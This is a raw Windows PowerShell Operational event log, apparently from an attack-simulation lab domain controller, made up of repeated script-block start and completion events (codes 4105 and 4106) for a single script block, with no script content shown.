LogName=Microsoft-Windows-PowerShell/Operational
SourceName=Microsoft-Windows-PowerShell
EventCode=4105
EventType=5
Type=Verbose
ComputerName=win-dc-721.attackrange.local
User=NOT_TRANSLATED
Sid=S-1-5-21-3463394951-919314656-1840492511-500
SidType=0
TaskCategory=Starting Command
OpCode=On create calls
RecordNumber=1468532
Keywords=None
Message=Started invocation of ScriptBlock ID: c03e44c5-33a8-41b9-adb5-16495b4dde39
Runspace ID: c5f1100c-56fc-4347-871f-80d397213539
06/15/2021 05:00:13 PM
LogName=Microsoft-Windows-PowerShell/Operational
SourceName=Microsoft-Windows-PowerShell
EventCode=4106
EventType=5
Type=Verbose
ComputerName=win-dc-721.attackrange.local
User=NOT_TRANSLATED
Sid=S-1-5-21-3463394951-919314656-1840492511-500
SidType=0
TaskCategory=Stopping Command
OpCode=On create calls
RecordNumber=1468531
Keywords=None
Message=Completed invocation of ScriptBlock ID: c03e44c5-33a8-41b9-adb5-16495b4dde39
Runspace ID: c5f1100c-56fc-4347-871f-80d397213539
06/15/2021 05:00:13 PM
LogName=Microsoft-Windows-PowerShell/Operational
SourceName=Microsoft-Windows-PowerShell
EventCode=4105
EventType=5
Type=Verbose
ComputerName=win-dc-721.attackrange.local
User=NOT_TRANSLATED
Sid=S-1-5-21-3463394951-919314656-1840492511-500
SidType=0
TaskCategory=Starting Command
OpCode=On create calls
RecordNumber=1468530
Keywords=None
Message=Started invocation of ScriptBlock ID: c03e44c5-33a8-41b9-adb5-16495b4dde39
Runspace ID: c5f1100c-56fc-4347-871f-80d397213539
06/15/2021 05:00:13 PM
LogName=Microsoft-Windows-PowerShell/Operational
SourceName=Microsoft-Windows-PowerShell
EventCode=4106
EventType=5
Type=Verbose
ComputerName=win-dc-721.attackrange.local
User=NOT_TRANSLATED
Sid=S-1-5-21-3463394951-919314656-1840492511-500
SidType=0
TaskCategory=Stopping Command
OpCode=On create calls
RecordNumber=1468529
Keywords=None
Message=Completed invocation of ScriptBlock ID: c03e44c5-33a8-41b9-adb5-16495b4dde39
Runspace ID: c5f1100c-56fc-4347-871f-80d397213539
06/15/2021 05:00:13 PM
LogName=Microsoft-Windows-PowerShell/Operational
SourceName=Microsoft-Windows-PowerShell
EventCode=4105
EventType=5
Type=Verbose
ComputerName=win-dc-721.attackrange.local
User=NOT_TRANSLATED
Sid=S-1-5-21-3463394951-919314656-1840492511-500
SidType=0
TaskCategory=Starting Command
OpCode=On create calls
RecordNumber=1468528
Keywords=None
Message=Started invocation of ScriptBlock ID: c03e44c5-33a8-41b9-adb5-16495b4dde39
Runspace ID: c5f1100c-56fc-4347-871f-80d397213539
06/15/2021 05:00:13 PM
LogName=Microsoft-Windows-PowerShell/Operational
SourceName=Microsoft-Windows-PowerShell
EventCode=4106
EventType=5
Type=Verbose
ComputerName=win-dc-721.attackrange.local
User=NOT_TRANSLATED
Sid=S-1-5-21-3463394951-919314656-1840492511-500
SidType=0
TaskCategory=Stopping Command
OpCode=On create calls
RecordNumber=1468527
Keywords=None
Message=Completed invocation of ScriptBlock ID: c03e44c5-33a8-41b9-adb5-16495b4dde39
Runspace ID: c5f1100c-56fc-4347-871f-80d397213539
06/15/2021 05:00:13 PM
LogName=Microsoft-Windows-PowerShell/Operational
SourceName=Microsoft-Windows-PowerShell
EventCode=4105
EventType=5
Type=Verbose
ComputerName=win-dc-721.attackrange.local
User=NOT_TRANSLATED
Sid=S-1-5-21-3463394951-919314656-1840492511-500
SidType=0
TaskCategory=Starting Command
OpCode=On create calls
RecordNumber=1468526
Keywords=None
Message=Started invocation of ScriptBlock ID: c03e44c5-33a8-41b9-adb5-16495b4dde39
Runspace ID: c5f1100c-56fc-4347-871f-80d397213539
06/15/2021 05:00:13 PM
LogName=Microsoft-Windows-PowerShell/Operational
SourceName=Microsoft-Windows-PowerShell
EventCode=4106
EventType=5
Type=Verbose
ComputerName=win-dc-721.attackrange.local
User=NOT_TRANSLATED
Sid=S-1-5-21-3463394951-919314656-1840492511-500
SidType=0
TaskCategory=Stopping Command
OpCode=On create calls
RecordNumber=1468525
Keywords=None
Message=Completed invocation of ScriptBlock ID: c03e44c5-33a8-41b9-adb5-16495b4dde39
Runspace ID: c5f1100c-56fc-4347-871f-80d397213539
06/15/2021 05:00:13 PM
LogName=Microsoft-Windows-PowerShell/Operational
SourceName=Microsoft-Windows-PowerShell
EventCode=4105
EventType=5
Type=Verbose
ComputerName=win-dc-721.attackrange.local
User=NOT_TRANSLATED
Sid=S-1-5-21-3463394951-919314656-1840492511-500
SidType=0
TaskCategory=Starting Command
OpCode=On create calls
RecordNumber=1468524
Keywords=None
Message=Started invocation of ScriptBlock ID: c03e44c5-33a8-41b9-adb5-16495b4dde39
Runspace ID: c5f1100c-56fc-4347-871f-80d397213539
06/15/2021 05:00:13 PM
LogName=Microsoft-Windows-PowerShell/Operational
SourceName=Microsoft-Windows-PowerShell
EventCode=4106
EventType=5
Type=Verbose
ComputerName=win-dc-721.attackrange.local
User=NOT_TRANSLATED
Sid=S-1-5-21-3463394951-919314656-1840492511-500
SidType=0
TaskCategory=Stopping Command
OpCode=On create calls
RecordNumber=1468523
Keywords=None
Message=Completed invocation of ScriptBlock ID: c03e44c5-33a8-41b9-adb5-16495b4dde39
Runspace ID: c5f1100c-56fc-4347-871f-80d397213539
06/15/2021 05:00:13 PM
LogName=Microsoft-Windows-PowerShell/Operational
SourceName=Microsoft-Windows-PowerShell
EventCode=4105
EventType=5
Type=Verbose
ComputerName=win-dc-721.attackrange.local
User=NOT_TRANSLATED
Sid=S-1-5-21-3463394951-919314656-1840492511-500
SidType=0
TaskCategory=Starting Command
OpCode=On create calls
RecordNumber=1468522
Keywords=None
Message=Started invocation of ScriptBlock ID: c03e44c5-33a8-41b9-adb5-16495b4dde39
Runspace ID: c5f1100c-56fc-4347-871f-80d397213539
06/15/2021 05:00:13 PM
LogName=Microsoft-Windows-PowerShell/Operational
SourceName=Microsoft-Windows-PowerShell
EventCode=4106
EventType=5
Type=Verbose
ComputerName=win-dc-721.attackrange.local
User=NOT_TRANSLATED
Sid=S-1-5-21-3463394951-919314656-1840492511-500
SidType=0
TaskCategory=Stopping Command
OpCode=On create calls
RecordNumber=1468521
Keywords=None
Message=Completed invocation of ScriptBlock ID: c03e44c5-33a8-41b9-adb5-16495b4dde39
Runspace ID: c5f1100c-56fc-4347-871f-80d397213539
06/15/2021 05:00:13 PM
LogName=Microsoft-Windows-PowerShell/Operational
SourceName=Microsoft-Windows-PowerShell
EventCode=4105
EventType=5
Type=Verbose
ComputerName=win-dc-721.attackrange.local
User=NOT_TRANSLATED
Sid=S-1-5-21-3463394951-919314656-1840492511-500
SidType=0
TaskCategory=Starting Command
OpCode=On create calls
RecordNumber=1468520
Keywords=None
Message=Started invocation of ScriptBlock ID: c03e44c5-33a8-41b9-adb5-16495b4dde39
Runspace ID: c5f1100c-56fc-4347-871f-80d397213539
06/15/2021 05:00:13 PM
LogName=Microsoft-Windows-PowerShell/Operational
SourceName=Microsoft-Windows-PowerShell
EventCode=4106
EventType=5
Type=Verbose
ComputerName=win-dc-721.attackrange.local
User=NOT_TRANSLATED
Sid=S-1-5-21-3463394951-919314656-1840492511-500
SidType=0
TaskCategory=Stopping Command
OpCode=On create calls
RecordNumber=1468519
Keywords=None
Message=Completed invocation of ScriptBlock ID: c03e44c5-33a8-41b9-adb5-16495b4dde39
Runspace ID: c5f1100c-56fc-4347-871f-80d397213539
06/15/2021 05:00:13 PM
LogName=Microsoft-Windows-PowerShell/Operational
SourceName=Microsoft-Windows-PowerShell
EventCode=4105
EventType=5
Type=Verbose
ComputerName=win-dc-721.attackrange.local
User=NOT_TRANSLATED
Sid=S-1-5-21-3463394951-919314656-1840492511-500
SidType=0
TaskCategory=Starting Command
OpCode=On create calls
RecordNumber=1468518
Keywords=None
Message=Started invocation of ScriptBlock ID: c03e44c5-33a8-41b9-adb5-16495b4dde39
Runspace ID: c5f1100c-56fc-4347-871f-80d397213539
06/15/2021 05:00:13 PM
LogName=Microsoft-Windows-PowerShell/Operational
SourceName=Microsoft-Windows-PowerShell
EventCode=4106
EventType=5
Type=Verbose
ComputerName=win-dc-721.attackrange.local
User=NOT_TRANSLATED
Sid=S-1-5-21-3463394951-919314656-1840492511-500
SidType=0
TaskCategory=Stopping Command
OpCode=On create calls
RecordNumber=1468517
Keywords=None
Message=Completed invocation of ScriptBlock ID: c03e44c5-33a8-41b9-adb5-16495b4dde39
Runspace ID: c5f1100c-56fc-4347-871f-80d397213539
06/15/2021 05:00:13 PM
LogName=Microsoft-Windows-PowerShell/Operational
SourceName=Microsoft-Windows-PowerShell
EventCode=4105
EventType=5
Type=Verbose
ComputerName=win-dc-721.attackrange.local
User=NOT_TRANSLATED
Sid=S-1-5-21-3463394951-919314656-1840492511-500
SidType=0
TaskCategory=Starting Command
OpCode=On create calls
RecordNumber=1468516
Keywords=None
Message=Started invocation of ScriptBlock ID: c03e44c5-33a8-41b9-adb5-16495b4dde39
Runspace ID: c5f1100c-56fc-4347-871f-80d397213539
06/15/2021 05:00:13 PM
LogName=Microsoft-Windows-PowerShell/Operational
SourceName=Microsoft-Windows-PowerShell
EventCode=4106
EventType=5
Type=Verbose
ComputerName=win-dc-721.attackrange.local
User=NOT_TRANSLATED
Sid=S-1-5-21-3463394951-919314656-1840492511-500
SidType=0
TaskCategory=Stopping Command
OpCode=On create calls
RecordNumber=1468515
Keywords=None
Message=Completed invocation of ScriptBlock ID: c03e44c5-33a8-41b9-adb5-16495b4dde39
Runspace ID: c5f1100c-56fc-4347-871f-80d397213539
06/15/2021 05:00:13 PM
LogName=Microsoft-Windows-PowerShell/Operational
SourceName=Microsoft-Windows-PowerShell
EventCode=4105
EventType=5
Type=Verbose
ComputerName=win-dc-721.attackrange.local
User=NOT_TRANSLATED
Sid=S-1-5-21-3463394951-919314656-1840492511-500
SidType=0
TaskCategory=Starting Command
OpCode=On create calls
RecordNumber=1468514
Keywords=None
Message=Started invocation of ScriptBlock ID: c03e44c5-33a8-41b9-adb5-16495b4dde39
Runspace ID: c5f1100c-56fc-4347-871f-80d397213539
06/15/2021 05:00:13 PM
LogName=Microsoft-Windows-PowerShell/Operational
SourceName=Microsoft-Windows-PowerShell
EventCode=4106
EventType=5
Type=Verbose
ComputerName=win-dc-721.attackrange.local
User=NOT_TRANSLATED
Sid=S-1-5-21-3463394951-919314656-1840492511-500
SidType=0
TaskCategory=Stopping Command
OpCode=On create calls
RecordNumber=1468513
Keywords=None
Message=Completed invocation of ScriptBlock ID: c03e44c5-33a8-41b9-adb5-16495b4dde39
Runspace ID: c5f1100c-56fc-4347-871f-80d397213539
06/15/2021 05:00:13 PM
LogName=Microsoft-Windows-PowerShell/Operational
SourceName=Microsoft-Windows-PowerShell
EventCode=4105
EventType=5
Type=Verbose
ComputerName=win-dc-721.attackrange.local
User=NOT_TRANSLATED
Sid=S-1-5-21-3463394951-919314656-1840492511-500
SidType=0
TaskCategory=Starting Command
OpCode=On create calls
RecordNumber=1468512
Keywords=None
Message=Started invocation of ScriptBlock ID: c03e44c5-33a8-41b9-adb5-16495b4dde39
Runspace ID: c5f1100c-56fc-4347-871f-80d397213539
06/15/2021 05:00:13 PM
LogName=Microsoft-Windows-PowerShell/Operational
SourceName=Microsoft-Windows-PowerShell
EventCode=4106
EventType=5
Type=Verbose
ComputerName=win-dc-721.attackrange.local
User=NOT_TRANSLATED
Sid=S-1-5-21-3463394951-919314656-1840492511-500
SidType=0
TaskCategory=Stopping Command
OpCode=On create calls
RecordNumber=1468511
Keywords=None
Message=Completed invocation of ScriptBlock ID: c03e44c5-33a8-41b9-adb5-16495b4dde39
Runspace ID: c5f1100c-56fc-4347-871f-80d397213539
06/15/2021 05:00:13 PM
LogName=Microsoft-Windows-PowerShell/Operational
SourceName=Microsoft-Windows-PowerShell
EventCode=4105
EventType=5
Type=Verbose
ComputerName=win-dc-721.attackrange.local
User=NOT_TRANSLATED
Sid=S-1-5-21-3463394951-919314656-1840492511-500
SidType=0
TaskCategory=Starting Command
OpCode=On create calls
RecordNumber=1468510
Keywords=None
Message=Started invocation of ScriptBlock ID: c03e44c5-33a8-41b9-adb5-16495b4dde39
Runspace ID: c5f1100c-56fc-4347-871f-80d397213539
06/15/2021 05:00:13 PM
LogName=Microsoft-Windows-PowerShell/Operational
SourceName=Microsoft-Windows-PowerShell
EventCode=4106
EventType=5
Type=Verbose
ComputerName=win-dc-721.attackrange.local
User=NOT_TRANSLATED
Sid=S-1-5-21-3463394951-919314656-1840492511-500
SidType=0
TaskCategory=Stopping Command
OpCode=On create calls
RecordNumber=1468509
Keywords=None
Message=Completed invocation of ScriptBlock ID: c03e44c5-33a8-41b9-adb5-16495b4dde39
Runspace ID: c5f1100c-56fc-4347-871f-80d397213539
06/15/2021 05:00:13 PM
LogName=Microsoft-Windows-PowerShell/Operational
SourceName=Microsoft-Windows-PowerShell
EventCode=4105
EventType=5
Type=Verbose
ComputerName=win-dc-721.attackrange.local
User=NOT_TRANSLATED
Sid=S-1-5-21-3463394951-919314656-1840492511-500
SidType=0
TaskCategory=Starting Command
OpCode=On create calls
RecordNumber=1468508
Keywords=None
Message=Started invocation of ScriptBlock ID: c03e44c5-33a8-41b9-adb5-16495b4dde39
Runspace ID: c5f1100c-56fc-4347-871f-80d397213539
06/15/2021 05:00:13 PM
LogName=Microsoft-Windows-PowerShell/Operational
SourceName=Microsoft-Windows-PowerShell
EventCode=4106
EventType=5
Type=Verbose
ComputerName=win-dc-721.attackrange.local
User=NOT_TRANSLATED
Sid=S-1-5-21-3463394951-919314656-1840492511-500
SidType=0
TaskCategory=Stopping Command
OpCode=On create calls
RecordNumber=1468507
Keywords=None
Message=Completed invocation of ScriptBlock ID: c03e44c5-33a8-41b9-adb5-16495b4dde39
Runspace ID: c5f1100c-56fc-4347-871f-80d397213539
06/15/2021 05:00:14 PM
LogName=Microsoft-Windows-PowerShell/Operational
SourceName=Microsoft-Windows-PowerShell
EventCode=4105
EventType=5
Type=Verbose
ComputerName=win-dc-721.attackrange.local
User=NOT_TRANSLATED
Sid=S-1-5-21-3463394951-919314656-1840492511-500
SidType=0
TaskCategory=Starting Command
OpCode=On create calls
RecordNumber=1468782
Keywords=None
Message=Started invocation of ScriptBlock ID: c03e44c5-33a8-41b9-adb5-16495b4dde39
Runspace ID: c5f1100c-56fc-4347-871f-80d397213539
06/15/2021 05:00:14 PM
LogName=Microsoft-Windows-PowerShell/Operational
SourceName=Microsoft-Windows-PowerShell
EventCode=4106
EventType=5
Type=Verbose
ComputerName=win-dc-721.attackrange.local
User=NOT_TRANSLATED
Sid=S-1-5-21-3463394951-919314656-1840492511-500
SidType=0
TaskCategory=Stopping Command
OpCode=On create calls
RecordNumber=1468781
Keywords=None
Message=Completed invocation of ScriptBlock ID: c03e44c5-33a8-41b9-adb5-16495b4dde39
Runspace ID: c5f1100c-56fc-4347-871f-80d397213539
06/15/2021 05:00:14 PM
LogName=Microsoft-Windows-PowerShell/Operational
SourceName=Microsoft-Windows-PowerShell
EventCode=4105
EventType=5
Type=Verbose
ComputerName=win-dc-721.attackrange.local
User=NOT_TRANSLATED
Sid=S-1-5-21-3463394951-919314656-1840492511-500
SidType=0
TaskCategory=Starting Command
OpCode=On create calls
RecordNumber=1468780
Keywords=None
Message=Started invocation of ScriptBlock ID: c03e44c5-33a8-41b9-adb5-16495b4dde39
Runspace ID: c5f1100c-56fc-4347-871f-80d397213539
06/15/2021 05:00:14 PM
LogName=Microsoft-Windows-PowerShell/Operational
SourceName=Microsoft-Windows-PowerShell
EventCode=4106
EventType=5
Type=Verbose
ComputerName=win-dc-721.attackrange.local
User=NOT_TRANSLATED
Sid=S-1-5-21-3463394951-919314656-1840492511-500
SidType=0
TaskCategory=Stopping Command
OpCode=On create calls
RecordNumber=1468779
Keywords=None
Message=Completed invocation of ScriptBlock ID: c03e44c5-33a8-41b9-adb5-16495b4dde39
Runspace ID: c5f1100c-56fc-4347-871f-80d397213539
06/15/2021 05:00:14 PM
LogName=Microsoft-Windows-PowerShell/Operational
SourceName=Microsoft-Windows-PowerShell
EventCode=4105
EventType=5
Type=Verbose
ComputerName=win-dc-721.attackrange.local
User=NOT_TRANSLATED
Sid=S-1-5-21-3463394951-919314656-1840492511-500
SidType=0
TaskCategory=Starting Command
OpCode=On create calls
RecordNumber=1468778
Keywords=None
Message=Started invocation of ScriptBlock ID: c03e44c5-33a8-41b9-adb5-16495b4dde39
Runspace ID: c5f1100c-56fc-4347-871f-80d397213539
06/15/2021 05:00:14 PM
LogName=Microsoft-Windows-PowerShell/Operational
SourceName=Microsoft-Windows-PowerShell
EventCode=4106
EventType=5
Type=Verbose
ComputerName=win-dc-721.attackrange.local
User=NOT_TRANSLATED
Sid=S-1-5-21-3463394951-919314656-1840492511-500
SidType=0
TaskCategory=Stopping Command
OpCode=On create calls
RecordNumber=1468777
Keywords=None
Message=Completed invocation of ScriptBlock ID: c03e44c5-33a8-41b9-adb5-16495b4dde39
Runspace ID: c5f1100c-56fc-4347-871f-80d397213539
06/15/2021 05:00:14 PM
LogName=Microsoft-Windows-PowerShell/Operational
SourceName=Microsoft-Windows-PowerShell
EventCode=4105
EventType=5
Type=Verbose
ComputerName=win-dc-721.attackrange.local
User=NOT_TRANSLATED
Sid=S-1-5-21-3463394951-919314656-1840492511-500
SidType=0
TaskCategory=Starting Command
OpCode=On create calls
RecordNumber=1468776
Keywords=None
Message=Started invocation of ScriptBlock ID: c03e44c5-33a8-41b9-adb5-16495b4dde39
Runspace ID: c5f1100c-56fc-4347-871f-80d397213539
06/15/2021 05:00:14 PM
LogName=Microsoft-Windows-PowerShell/Operational
SourceName=Microsoft-Windows-PowerShell
EventCode=4106
EventType=5
Type=Verbose
ComputerName=win-dc-721.attackrange.local
User=NOT_TRANSLATED
Sid=S-1-5-21-3463394951-919314656-1840492511-500
SidType=0
TaskCategory=Stopping Command
OpCode=On create calls
RecordNumber=1468775
Keywords=None
Message=Completed invocation of ScriptBlock ID: c03e44c5-33a8-41b9-adb5-16495b4dde39
Runspace ID: c5f1100c-56fc-4347-871f-80d397213539
06/15/2021 05:00:14 PM
LogName=Microsoft-Windows-PowerShell/Operational
SourceName=Microsoft-Windows-PowerShell
EventCode=4105
EventType=5
Type=Verbose
ComputerName=win-dc-721.attackrange.local
User=NOT_TRANSLATED
Sid=S-1-5-21-3463394951-919314656-1840492511-500
SidType=0
TaskCategory=Starting Command
OpCode=On create calls
RecordNumber=1468774
Keywords=None
Message=Started invocation of ScriptBlock ID: c03e44c5-33a8-41b9-adb5-16495b4dde39
Runspace ID: c5f1100c-56fc-4347-871f-80d397213539
06/15/2021 05:00:14 PM
LogName=Microsoft-Windows-PowerShell/Operational
SourceName=Microsoft-Windows-PowerShell
EventCode=4106
EventType=5
Type=Verbose
ComputerName=win-dc-721.attackrange.local
User=NOT_TRANSLATED
Sid=S-1-5-21-3463394951-919314656-1840492511-500
SidType=0
TaskCategory=Stopping Command
OpCode=On create calls
RecordNumber=1468773
Keywords=None
Message=Completed invocation of ScriptBlock ID: c03e44c5-33a8-41b9-adb5-16495b4dde39
Runspace ID: c5f1100c-56fc-4347-871f-80d397213539
06/15/2021 05:00:14 PM
LogName=Microsoft-Windows-PowerShell/Operational
SourceName=Microsoft-Windows-PowerShell
EventCode=4105
EventType=5
Type=Verbose
ComputerName=win-dc-721.attackrange.local
User=NOT_TRANSLATED
Sid=S-1-5-21-3463394951-919314656-1840492511-500
SidType=0
TaskCategory=Starting Command
OpCode=On create calls
RecordNumber=1468772
Keywords=None
Message=Started invocation of ScriptBlock ID: c03e44c5-33a8-41b9-adb5-16495b4dde39
Runspace ID: c5f1100c-56fc-4347-871f-80d397213539
06/15/2021 05:00:14 PM
LogName=Microsoft-Windows-PowerShell/Operational
SourceName=Microsoft-Windows-PowerShell
EventCode=4106
EventType=5
Type=Verbose
ComputerName=win-dc-721.attackrange.local
User=NOT_TRANSLATED
Sid=S-1-5-21-3463394951-919314656-1840492511-500
SidType=0
TaskCategory=Stopping Command
OpCode=On create calls
RecordNumber=1468771
Keywords=None
Message=Completed invocation of ScriptBlock ID: c03e44c5-33a8-41b9-adb5-16495b4dde39
Runspace ID: c5f1100c-56fc-4347-871f-80d397213539
06/15/2021 05:00:14 PM
LogName=Microsoft-Windows-PowerShell/Operational
SourceName=Microsoft-Windows-PowerShell
EventCode=4105
EventType=5
Type=Verbose
ComputerName=win-dc-721.attackrange.local
User=NOT_TRANSLATED
Sid=S-1-5-21-3463394951-919314656-1840492511-500
SidType=0
TaskCategory=Starting Command
OpCode=On create calls
RecordNumber=1468770
Keywords=None
Message=Started invocation of ScriptBlock ID: c03e44c5-33a8-41b9-adb5-16495b4dde39
Runspace ID: c5f1100c-56fc-4347-871f-80d397213539
06/15/2021 05:00:14 PM
LogName=Microsoft-Windows-PowerShell/Operational
SourceName=Microsoft-Windows-PowerShell
EventCode=4106
EventType=5
Type=Verbose
ComputerName=win-dc-721.attackrange.local
User=NOT_TRANSLATED
Sid=S-1-5-21-3463394951-919314656-1840492511-500
SidType=0
TaskCategory=Stopping Command
OpCode=On create calls
RecordNumber=1468769
Keywords=None
Message=Completed invocation of ScriptBlock ID: c03e44c5-33a8-41b9-adb5-16495b4dde39
Runspace ID: c5f1100c-56fc-4347-871f-80d397213539
06/15/2021 05:00:14 PM
LogName=Microsoft-Windows-PowerShell/Operational
SourceName=Microsoft-Windows-PowerShell
EventCode=4105
EventType=5
Type=Verbose
ComputerName=win-dc-721.attackrange.local
User=NOT_TRANSLATED
Sid=S-1-5-21-3463394951-919314656-1840492511-500
SidType=0
TaskCategory=Starting Command
OpCode=On create calls
RecordNumber=1468768
Keywords=None
Message=Started invocation of ScriptBlock ID: c03e44c5-33a8-41b9-adb5-16495b4dde39
Runspace ID: c5f1100c-56fc-4347-871f-80d397213539
06/15/2021 05:00:14 PM
LogName=Microsoft-Windows-PowerShell/Operational
SourceName=Microsoft-Windows-PowerShell
EventCode=4106
EventType=5
Type=Verbose
ComputerName=win-dc-721.attackrange.local
User=NOT_TRANSLATED
Sid=S-1-5-21-3463394951-919314656-1840492511-500
SidType=0
TaskCategory=Stopping Command
OpCode=On create calls
RecordNumber=1468767
Keywords=None
Message=Completed invocation of ScriptBlock ID: c03e44c5-33a8-41b9-adb5-16495b4dde39
Runspace ID: c5f1100c-56fc-4347-871f-80d397213539
06/15/2021 05:00:14 PM
LogName=Microsoft-Windows-PowerShell/Operational
SourceName=Microsoft-Windows-PowerShell
EventCode=4105
EventType=5
Type=Verbose
ComputerName=win-dc-721.attackrange.local
User=NOT_TRANSLATED
Sid=S-1-5-21-3463394951-919314656-1840492511-500
SidType=0
TaskCategory=Starting Command
OpCode=On create calls
RecordNumber=1468766
Keywords=None
Message=Started invocation of ScriptBlock ID: c03e44c5-33a8-41b9-adb5-16495b4dde39
Runspace ID: c5f1100c-56fc-4347-871f-80d397213539
06/15/2021 05:00:14 PM
LogName=Microsoft-Windows-PowerShell/Operational
SourceName=Microsoft-Windows-PowerShell
EventCode=4106
EventType=5
Type=Verbose
ComputerName=win-dc-721.attackrange.local
User=NOT_TRANSLATED
Sid=S-1-5-21-3463394951-919314656-1840492511-500
SidType=0
TaskCategory=Stopping Command
OpCode=On create calls
RecordNumber=1468765
Keywords=None
Message=Completed invocation of ScriptBlock ID: c03e44c5-33a8-41b9-adb5-16495b4dde39
Runspace ID: c5f1100c-56fc-4347-871f-80d397213539
06/15/2021 05:00:14 PM
LogName=Microsoft-Windows-PowerShell/Operational
SourceName=Microsoft-Windows-PowerShell
EventCode=4105
EventType=5
Type=Verbose
ComputerName=win-dc-721.attackrange.local
User=NOT_TRANSLATED
Sid=S-1-5-21-3463394951-919314656-1840492511-500
SidType=0
TaskCategory=Starting Command
OpCode=On create calls
RecordNumber=1468764
Keywords=None
Message=Started invocation of ScriptBlock ID: c03e44c5-33a8-41b9-adb5-16495b4dde39
Runspace ID: c5f1100c-56fc-4347-871f-80d397213539
06/15/2021 05:00:14 PM
LogName=Microsoft-Windows-PowerShell/Operational
SourceName=Microsoft-Windows-PowerShell
EventCode=4106
EventType=5
Type=Verbose
ComputerName=win-dc-721.attackrange.local
User=NOT_TRANSLATED
Sid=S-1-5-21-3463394951-919314656-1840492511-500
SidType=0
TaskCategory=Stopping Command
OpCode=On create calls
RecordNumber=1468763
Keywords=None
Message=Completed invocation of ScriptBlock ID: c03e44c5-33a8-41b9-adb5-16495b4dde39
Runspace ID: c5f1100c-56fc-4347-871f-80d397213539
06/15/2021 05:00:14 PM
LogName=Microsoft-Windows-PowerShell/Operational
SourceName=Microsoft-Windows-PowerShell
EventCode=4105
EventType=5
Type=Verbose
ComputerName=win-dc-721.attackrange.local
User=NOT_TRANSLATED
Sid=S-1-5-21-3463394951-919314656-1840492511-500
SidType=0
TaskCategory=Starting Command
OpCode=On create calls
RecordNumber=1468762
Keywords=None
Message=Started invocation of ScriptBlock ID: c03e44c5-33a8-41b9-adb5-16495b4dde39
Runspace ID: c5f1100c-56fc-4347-871f-80d397213539
06/15/2021 05:00:14 PM
LogName=Microsoft-Windows-PowerShell/Operational
SourceName=Microsoft-Windows-PowerShell
EventCode=4106
EventType=5
Type=Verbose
ComputerName=win-dc-721.attackrange.local
User=NOT_TRANSLATED
Sid=S-1-5-21-3463394951-919314656-1840492511-500
SidType=0
TaskCategory=Stopping Command
OpCode=On create calls
RecordNumber=1468761
Keywords=None
Message=Completed invocation of ScriptBlock ID: c03e44c5-33a8-41b9-adb5-16495b4dde39
Runspace ID: c5f1100c-56fc-4347-871f-80d397213539
06/15/2021 05:00:14 PM
LogName=Microsoft-Windows-PowerShell/Operational
SourceName=Microsoft-Windows-PowerShell
EventCode=4105
EventType=5
Type=Verbose
ComputerName=win-dc-721.attackrange.local
User=NOT_TRANSLATED
Sid=S-1-5-21-3463394951-919314656-1840492511-500
SidType=0
TaskCategory=Starting Command
OpCode=On create calls
RecordNumber=1468760
Keywords=None
Message=Started invocation of ScriptBlock ID: c03e44c5-33a8-41b9-adb5-16495b4dde39
Runspace ID: c5f1100c-56fc-4347-871f-80d397213539
06/15/2021 05:00:14 PM
LogName=Microsoft-Windows-PowerShell/Operational
SourceName=Microsoft-Windows-PowerShell
EventCode=4106
EventType=5
Type=Verbose
ComputerName=win-dc-721.attackrange.local
User=NOT_TRANSLATED
Sid=S-1-5-21-3463394951-919314656-1840492511-500
SidType=0
TaskCategory=Stopping Command
OpCode=On create calls
RecordNumber=1468759
Keywords=None
Message=Completed invocation of ScriptBlock ID: c03e44c5-33a8-41b9-adb5-16495b4dde39
Runspace ID: c5f1100c-56fc-4347-871f-80d397213539
06/15/2021 05:00:14 PM
LogName=Microsoft-Windows-PowerShell/Operational
SourceName=Microsoft-Windows-PowerShell
EventCode=4105
EventType=5
Type=Verbose
ComputerName=win-dc-721.attackrange.local
User=NOT_TRANSLATED
Sid=S-1-5-21-3463394951-919314656-1840492511-500
SidType=0
TaskCategory=Starting Command
OpCode=On create calls
RecordNumber=1468758
Keywords=None
Message=Started invocation of ScriptBlock ID: c03e44c5-33a8-41b9-adb5-16495b4dde39
Runspace ID: c5f1100c-56fc-4347-871f-80d397213539
06/15/2021 05:00:14 PM
LogName=Microsoft-Windows-PowerShell/Operational
SourceName=Microsoft-Windows-PowerShell
EventCode=4106
EventType=5
Type=Verbose
ComputerName=win-dc-721.attackrange.local
User=NOT_TRANSLATED
Sid=S-1-5-21-3463394951-919314656-1840492511-500
SidType=0
TaskCategory=Stopping Command
OpCode=On create calls
RecordNumber=1468757
Keywords=None
Message=Completed invocation of ScriptBlock ID: c03e44c5-33a8-41b9-adb5-16495b4dde39
Runspace ID: c5f1100c-56fc-4347-871f-80d397213539
06/15/2021 05:00:14 PM
LogName=Microsoft-Windows-PowerShell/Operational
SourceName=Microsoft-Windows-PowerShell
EventCode=4105
EventType=5
Type=Verbose
ComputerName=win-dc-721.attackrange.local
User=NOT_TRANSLATED
Sid=S-1-5-21-3463394951-919314656-1840492511-500
SidType=0
TaskCategory=Starting Command
OpCode=On create calls
RecordNumber=1468756
Keywords=None
Message=Started invocation of ScriptBlock ID: c03e44c5-33a8-41b9-adb5-16495b4dde39
Runspace ID: c5f1100c-56fc-4347-871f-80d397213539
06/15/2021 05:00:14 PM
LogName=Microsoft-Windows-PowerShell/Operational
SourceName=Microsoft-Windows-PowerShell
EventCode=4106
EventType=5
Type=Verbose
ComputerName=win-dc-721.attackrange.local
User=NOT_TRANSLATED
Sid=S-1-5-21-3463394951-919314656-1840492511-500
SidType=0
TaskCategory=Stopping Command
OpCode=On create calls
RecordNumber=1468755
Keywords=None
Message=Completed invocation of ScriptBlock ID: c03e44c5-33a8-41b9-adb5-16495b4dde39
Runspace ID: c5f1100c-56fc-4347-871f-80d397213539
06/15/2021 05:00:14 PM
LogName=Microsoft-Windows-PowerShell/Operational
SourceName=Microsoft-Windows-PowerShell
EventCode=4105
EventType=5
Type=Verbose
ComputerName=win-dc-721.attackrange.local
User=NOT_TRANSLATED
Sid=S-1-5-21-3463394951-919314656-1840492511-500
SidType=0
TaskCategory=Starting Command
OpCode=On create calls
RecordNumber=1468754
Keywords=None
Message=Started invocation of ScriptBlock ID: c03e44c5-33a8-41b9-adb5-16495b4dde39
Runspace ID: c5f1100c-56fc-4347-871f-80d397213539
06/15/2021 05:00:14 PM
LogName=Microsoft-Windows-PowerShell/Operational
SourceName=Microsoft-Windows-PowerShell
EventCode=4106
EventType=5
Type=Verbose
ComputerName=win-dc-721.attackrange.local
User=NOT_TRANSLATED
Sid=S-1-5-21-3463394951-919314656-1840492511-500
SidType=0
TaskCategory=Stopping Command
OpCode=On create calls
RecordNumber=1468753
Keywords=None
